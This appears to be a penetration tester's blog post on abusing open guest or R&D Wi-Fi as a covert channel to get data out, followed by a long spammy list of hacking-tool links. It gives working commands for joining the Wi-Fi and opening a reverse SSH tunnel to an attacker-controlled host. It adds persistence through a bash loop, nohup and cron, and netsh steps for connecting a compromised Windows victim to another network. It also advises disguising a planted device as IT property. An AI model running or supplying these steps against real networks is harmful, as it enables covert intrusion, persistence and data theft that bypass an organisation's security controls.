Often times I find unprotected wireless access points with unfettered access to the internet for research or guest access purposes. This is generally through an unauthenticated portal or a direct cable connection. When questioning the business units they explain a low value network, which is simply a internet pass thru separate from the internal network. This sounds reasonable and almost plausible however I usually explain the dangers of having company assets on an unprotected Wi-Fi and the dangers of client side exploits and MITM attacks. But there are a few other plausible scenarios one should be aware of that may scare you a bit more then the former discussion.
What about using OpenWifi as a backchannel data exfiltration medium?
An open Wi-Fi is a perfect data exfiltration medium for attackers to completely bypass egress filtering issues, DLP, proxy filtering issues and a whole bunch of other protection mechanisms in place to keep attackers from sending out shells and moving data between networks. This can easily be accomplished via dual homing your attack host utilizing multiple nic cards which are standard on almost all modern machines. Whether this is from physical access breach or via remote compromise the results can be deadly. Below are a few scenarios, which can lead to undetectable data exfiltration.
Scenario 1: (PwnPlug/Linux host with Wi-Fi adaptor)
The first useful scenario is when a physical perimeter has been breached and a small device from http://pwnieexpress.com/ known as a pwn-plug is installed into the target network or a linux host with a wireless card. I usually install pwn-plug's inside a closet or under a desk somewhere which is not visible and allows a network connection out to an attacker owned host. Typically its a good idea to label the small device as "IT property and Do Not Remove". This will keep a casual user from removing the device. However if there is network egress and proxy filtering present then our network connection may never reach a remote host. At this point your physical breach to gain network access to an impenetrable network perimeter will fail. Unless there happens to be an open cable Wi-Fi connection to an "inconsequential R&D network".
By simply attaching an Alpha card to the pwnplug you can connect to the R&D wireless network. You can then use this network as your outgoing connection and avoid corporate restrictions regarding outbound connections via metasploit or ssh. I have noticed that most clients these days are running heavy egress filtering and packet level protocol detection, which stops outbound connections. Rather then play the obfuscation game i prefer to bypass the restrictions all together using networks which have escaped corporate policy.
You can automate the following via a script if you wardrive the facility prior to entrance and gain insight into the open wireless network, or you can also configure the plug via serial connection on site provided you have time.
Connect to wifi:
ifconfig wlan0 up
iwconfig wlan0 essid [targetNetworkSSID]
dhclient wlan0
Run a reverse SSH tunnel:
ssh -R 3000:127.0.0.1:22 root@remoteHost.com
On the remote host you can retrieve your shell:
ssh -p 3000 User@localhost
Once you have authenticated with the pwnplug via your local host port forward you now have access into the internal network via an encrypted tunnel which will not be detected and fully bypass any corporate security restrictions. You can take this a bit further and setup some persistence in case the shell goes down.. This can be done via bash and nohup if you setup some ssh keys to handle authentication.. One example could be the following script:
Your bash script:
#---------------------
#!/bin/bash
while true
do
ssh -R 3000:127.0.0.1:22 root@remoteHost.com
sleep 10
done
#---------------------
Run this with nohup like this:
nohup ./shell.sh &
Another simple way would be to setup a cron job to run a script with your ssh command on a specified interval for example every 5 minutes like so:
Cron job for every 5 minutes:
*/5 * * * * /shell.sh
Scenario 2: (Remote Windows Compromise)
The second scenario is that of a compromised modern windows machine with a wireless card, this can be used to make a wireless connection outbound similar to the first scenario which will bypass restrictions by accessing an unrestricted network. As shown in "Vista Power Tools" paper written by Josh Wright you can use modern windows machines cards via the command line.
http://www.inguardians.com/pubs/Vista_Wireless_Power_Tools-Wright.pdf
Below are the commands to profile the networks and export a current profile then import a new profile for your target wireless network. Then from there you can connect and use that network to bypass corp restrictions provided that wireless network doesn't have its own restrictions.
Profile Victim machine and extract a wireless profile:
netsh wlan show interfaces
netsh wlan show networks mode=bssid
netsh wlan show profiles
netsh wlan export profile name="CorpNetwork"
Then modify that profile to meet the requirements needed for the R&D network and import it into the victim machine.
Upload a new profile and connect to the network:
netsh wlan add profile filename="R&D.xml"
netsh wlan show profiles
netsh wlan connect name="R&D"
If you check out Josh's excellent paper linked above you will also find ways of bridging between ethernet and wireless adaptors along with lots of other ideas and useful information.
I just got thinking the other day of ways to abuse so called guest or R&D networks and started writing down a few ideas based on scenarios which play out time and time again while penetration testing networks and running physical breach attacks. I hear all to often that a cable connection not linked to the corporate network is totally safe and I call bullshit on that.
Related posts
- Hacker Security Tools
- Pentest Tools Nmap
- Blackhat Hacker Tools
- Hacker Techniques Tools And Incident Handling
- Hacking Tools Name
- Growth Hacker Tools
- Hacking Tools For Windows 7
- Nsa Hack Tools Download
- Hacking Tools Hardware
- Github Hacking Tools
- How To Hack
- Hacker Techniques Tools And Incident Handling
- Nsa Hack Tools Download
- Pentest Tools Linux
- Hacker Tools Free
- Hacking Tools
- Hacking Tools For Games
- Hacker Tools Windows
- Black Hat Hacker Tools
- Hacking Tools Windows 10
- Hacking Tools Online
- Pentest Tools Website
- Computer Hacker
- Bluetooth Hacking Tools Kali
- Hacking Tools
- Pentest Tools Website
- Pentest Tools Download
- Ethical Hacker Tools
- Hack Tools Download
- Hacker Tools Linux
- Hack Website Online Tool
- Easy Hack Tools
- Hacking Tools Mac
- Hacker Security Tools
- Hacker Security Tools
- Hacking Tools And Software
- Easy Hack Tools
- Hacking Tools And Software
- Pentest Tools Nmap
- Hacker Tools Hardware
- Tools 4 Hack
- Hacking Tools 2019
- Hacking Tools For Windows Free Download
- Hacker
- Easy Hack Tools
- Hacking App
- Hack Tools Mac
- Hacking Tools Windows 10
- Top Pentest Tools
- Hacking Tools Github
- Hacking Tools And Software
- Hacker Tools Online
- Pentest Tools Windows
- Hacking Tools Download
- Pentest Tools Review
- Hack Tools Download
- Black Hat Hacker Tools
- Nsa Hack Tools Download
- Free Pentest Tools For Windows
- Install Pentest Tools Ubuntu
- Hacker Hardware Tools
- Hacking Tools For Kali Linux
- Kik Hack Tools
- Game Hacking
- Top Pentest Tools
- Hacking Tools 2019
- Hacker Tools List
- Hack App
- Pentest Tools Alternative
- Hacker Tools List
- Termux Hacking Tools 2019
- Hacking Tools For Games
- Hack Website Online Tool
- Kik Hack Tools
- Game Hacking
- Hacking Tools Hardware
- Hacking Tools For Windows Free Download
- Hacker Tools Hardware
- Hacking Tools For Pc
- Hacker Tools For Mac
- What Is Hacking Tools
- Hack Tool Apk
- Pentest Tools For Windows
- Hacking Tools Windows 10
- Hacker Tools Software
- Hackrf Tools
- Hacking Tools Name
- Hacking Tools Download
- Hacker Tools 2019
- Hacker Tools Apk Download
- Hacking Tools Pc
- Best Hacking Tools 2019
- Hacker Tools For Mac
- Hacking Tools Usb
- Hacker Tool Kit
- Hacking Tools Usb
- Hacker Tools Hardware
- How To Make Hacking Tools
- Pentest Tools Port Scanner
- Hacker Tools Software
- Best Hacking Tools 2020
- Pentest Tools Linux
- Hacking Tools Windows 10
- Bluetooth Hacking Tools Kali
- Hacker Tools For Pc
- Hacker Tools Hardware
- Tools 4 Hack
- Tools 4 Hack
- Tools 4 Hack
- Hack Tools For Games
- Hacker Tools Free Download
- What Are Hacking Tools
- Pentest Tools Apk
- Hack Tools For Pc
- Hacking Tools For Games
- Hacking Tools Usb
- Hacking Tools
- Hacker Search Tools
- Hacker Tools Windows
- Hacker Tools 2019
- Pentest Tools Android
- Tools Used For Hacking
- How To Install Pentest Tools In Ubuntu
- Hack And Tools
- Pentest Tools Kali Linux
- Hacker Search Tools
- Pentest Tools Bluekeep
- Hack Rom Tools
- Pentest Automation Tools
- Hacking Tools For Mac
- Pentest Tools Kali Linux
- Tools Used For Hacking
- Hacking App
- Pentest Tools Website Vulnerability
- Hacking Tools Hardware
- Pentest Tools For Windows
- Pentest Tools Url Fuzzer
- Hacking Apps
- Free Pentest Tools For Windows
- Hacking Tools
- Pentest Tools For Windows
- Pentest Tools Url Fuzzer
- Hacking Tools For Games
- Hacking Tools Kit
- Pentest Tools Url Fuzzer
- Hacker Hardware Tools
- Pentest Tools Free
- Hacking Tools For Windows 7
- Hacking Tools 2020
- Hacking Tools Usb
- Hack Tools For Games
- Best Hacking Tools 2020
- Hacking Tools Windows 10
- Hacker Tools 2020
- Hacker Tools Hardware
- Hacking Tools Free Download
- Pentest Tools Android
- World No 1 Hacker Software
- Hak5 Tools
- Nsa Hack Tools
- Hacker Tools Linux
- Hacking Tools Usb
- Hack Tool Apk No Root
- Github Hacking Tools
- Hackers Toolbox
- Hack Tools Github
- Hacker Tools Free Download
- Hacking Tools For Pc
- Hack Tool Apk
- Hack Tools 2019
- Kik Hack Tools
- Pentest Tools Bluekeep
- Computer Hacker
- Pentest Tools List
- Wifi Hacker Tools For Windows
- Pentest Tools
No comments:
Post a Comment